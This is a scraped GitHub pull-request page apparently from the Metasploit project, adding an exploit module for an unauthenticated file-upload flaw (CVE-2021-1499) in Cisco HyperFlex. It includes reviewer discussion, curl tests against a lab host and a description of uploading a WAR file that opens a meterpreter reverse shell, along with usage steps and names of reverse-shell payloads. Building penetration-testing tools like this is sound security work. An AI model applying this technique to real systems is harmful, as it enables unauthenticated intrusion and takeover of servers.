-
Notifications
You must be signed in to change notification settings - Fork 13.8k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Cisco HyperFlex File Upload RCE #15333
Cisco HyperFlex File Upload RCE #15333
Conversation
@msjenkins-r7 test this please. |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Just left a few comments. If this is ready, I can move on to testing it once they're addressed. Looks good overall, nice work @jheysel-r7 !
@smcintyre-r7 Thanks for the review, much appreciated! Before wvu left for vacation they reminded me that we have native Java payloads. Wondering what your opinion is on switching from ** Edit: Or adding functionality to support both? |
documentation/modules/exploit/linux/http/cisco_hyperflex_file_upload_rce.md
Outdated
Show resolved
Hide resolved
documentation/modules/exploit/linux/http/cisco_hyperflex_file_upload_rce.md
Outdated
Show resolved
Hide resolved
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Congrats on another module! Overall good job. Bye.
end | ||
|
||
def exploit | ||
app_base = 'crossdomain.xml' |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
FWIW, there are more discreet options that work with a Java payload.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
I assume I need to find a payload that returns a shell automatically when it deploys itself in the tomcat7/webapps/
directory? That would remove the need to name the war file crossdomain.xml.war
I named the directory crossdomain.xml
due to the nginx configuration - if named anything else I don't think I'm able to execute what's inside as I get a 301.
Success when named directory named crossdomain.xml
:
➜ metasploit-framework git:(hyperflex_file_upload_rce) ✗ curl -v http://192.168.123.145/crossdomain.xml/pngynhbplt.jsp
* Trying 192.168.123.145...
* TCP_NODELAY set
* Connected to 192.168.123.145 (192.168.123.145) port 80 (#0)
> GET /crossdomain.xml/pngynhbplt.jsp HTTP/1.1
> Host: 192.168.123.145
> User-Agent: curl/7.64.1
> Accept: */*
>
< HTTP/1.1 200 OK
< Server: nginx/1.8.1
< Date: Wed, 16 Jun 2021 18:07:29 GMT
< Content-Type: text/html;charset=ISO-8859-1
< Content-Length: 6
< Connection: keep-alive
< Set-Cookie: JSESSIONID=9EDC41FB32DB4C8E66FDF87833703789; Path=/crossdomain.xml/; HttpOnly
< Content-Security-Policy: default-src 'self'; script-src 'self' 'sha256-NqIRKoqKg0DGa/4ZvALvdLDeCWjHxRJAGWG9bR7oqhg='; img-src 'self'; style-src 'self' 'sha256-+iKfdo1l+xjgkzhMgz1wtLzCQP0aDTXicQujdoPsGrM='; font-src 'self' 'sha256-+iKfdo1l+xjgkzhMgz1wtLzCQP0aDTXicQujdoPsGrM='; frame-src 'self'; frame-ancestors 'self'; object-src 'none'; connect-src 'self'
< X-Content-Type-Options: nosniff
< X-XSS-Protection: 1; mode=block
<
* Connection #0 to host 192.168.123.145 left intact
* Closing connection 0
Unsuccessful when named something else:
➜ metasploit-framework git:(hyperflex_file_upload_rce) ✗ curl -v http://192.168.123.145/jsp_shell_reverse_tcp/pngynhbplt.jsp
* Trying 192.168.123.145...
* TCP_NODELAY set
* Connected to 192.168.123.145 (192.168.123.145) port 80 (#0)
> GET /jsp_shell_reverse_tcp/pngynhbplt.jsp HTTP/1.1
> Host: 192.168.123.145
> User-Agent: curl/7.64.1
> Accept: */*
>
< HTTP/1.1 301 Moved Permanently
< Server: nginx/1.8.1
< Date: Wed, 16 Jun 2021 18:06:17 GMT
< Content-Type: text/html
< Content-Length: 184
< Connection: keep-alive
< Location: https://192.168.123.145/jsp_shell_reverse_tcp/pngynhbplt.jsp
< Content-Security-Policy: default-src 'self'; script-src 'self' 'sha256-NqIRKoqKg0DGa/4ZvALvdLDeCWjHxRJAGWG9bR7oqhg='; img-src 'self'; style-src 'self' 'sha256-+iKfdo1l+xjgkzhMgz1wtLzCQP0aDTXicQujdoPsGrM='; font-src 'self' 'sha256-+iKfdo1l+xjgkzhMgz1wtLzCQP0aDTXicQujdoPsGrM='; frame-src 'self'; frame-ancestors 'self'; object-src 'none'; connect-src 'self'
< X-Content-Type-Options: nosniff
< X-XSS-Protection: 1; mode=block
<
<html>
<head><title>301 Moved Permanently</title></head>
<body bgcolor="white">
<center><h1>301 Moved Permanently</h1></center>
<hr><center>nginx/1.8.1</center>
</body>
</html>
* Connection #0 to host 192.168.123.145 left intact
* Closing connection 0
I've tried the following java payloads:
java/meterpreter/reverse_tcp
java/jsp_shell_reverse_tcp
java/shell_reverse_tcp
and am unable to get a shell without naming the directory crossdomain.xml
.
I might be making an incorrect assumption with regards to how need to execute the payload once uploaded.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
There are other nginx locations that work. I was using a payload servlet. Maybe we can go over the different approaches when I come back. :)
register_file_for_cleanup('/var/lib/tomcat7/crossdomain.xml.war') | ||
register_file_for_cleanup('/var/lib/tomcat7/crossdomain.xml/') |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Is a way to change the name as discussed here is found this will need to account for it.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
After thorough testing I haven't been able to find a way to change the name of the file while still being able to execute it. I think these will stay as is.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
FYI, these paths are incorrect, and register_dir_for_cleanup
is preferred.
80287a4
to
90e8a6e
Compare
beta draft RCE working with linux/x64/meterpreter_reverse_tcp rubocop Updated title, removed newlines Responded to comments Rubo cop offenses Update documentation/modules/exploit/linux/http/cisco_hyperflex_file_upload_rce.md Co-authored-by: wvu <wvu-r7@users.noreply.github.com> Update modules/exploits/linux/http/cisco_hyperflex_file_upload_rce.rb Co-authored-by: wvu <wvu-r7@users.noreply.github.com> Update modules/exploits/linux/http/cisco_hyperflex_file_upload_rce.rb Co-authored-by: wvu <wvu-r7@users.noreply.github.com> Update modules/exploits/linux/http/cisco_hyperflex_file_upload_rce.rb Co-authored-by: wvu <wvu-r7@users.noreply.github.com> Update modules/exploits/linux/http/cisco_hyperflex_file_upload_rce.rb Co-authored-by: wvu <wvu-r7@users.noreply.github.com> Responded to comments Rubocop offenses Added support for Java Dropper Made changes to Linux Dropper Rubocop Improved check method, changed to default staged paylod, removed TODO Switched to single-quoted strings
90e8a6e
to
281fce0
Compare
Just tested this one last time and confirmed it's working as intended. I tested both targets and the Linux dropper with both a staged and unstaged payload. Both did work, but the unstaged payload does seem slightly more reliable. Since that's the default value, it seems fine.
I'll have this landed in a moment, thanks @jheysel-r7 ! |
Release NotesThis adds an exploit module targeting a file upload vulnerability within the Cisco Hyperflex application that can be used to obtain unauthenticated remote code execution. |
Excellent effort on this, @jheysel-r7. :) |
Exploit module to leverage CVE-2021-1499: Unauthenticated file upload vulnerability in Cisco HyperFlex HX Data Platform.
Currently the module is set to use
linux/x64/meterpreter_reverse_tcp
by default. It uploads the war file to/var/lib/tomcat7/webapps/
, the.war
file gets auto deployed and then the module manually calls the.jsp
file inside the deployed war file which sends a meterpreter session back to the user.Potential Changes
It came to my attention during development that I'd likely be able to make use of a
java/meterpreter
payload. I'm going to continue investigating support for this.Verification
List the steps needed to make sure this thing works
msfconsole
use exploit/linux/http/cisco_hyperflex_file_upload_rce
RHOSTS
andLHOST
run
Demonstration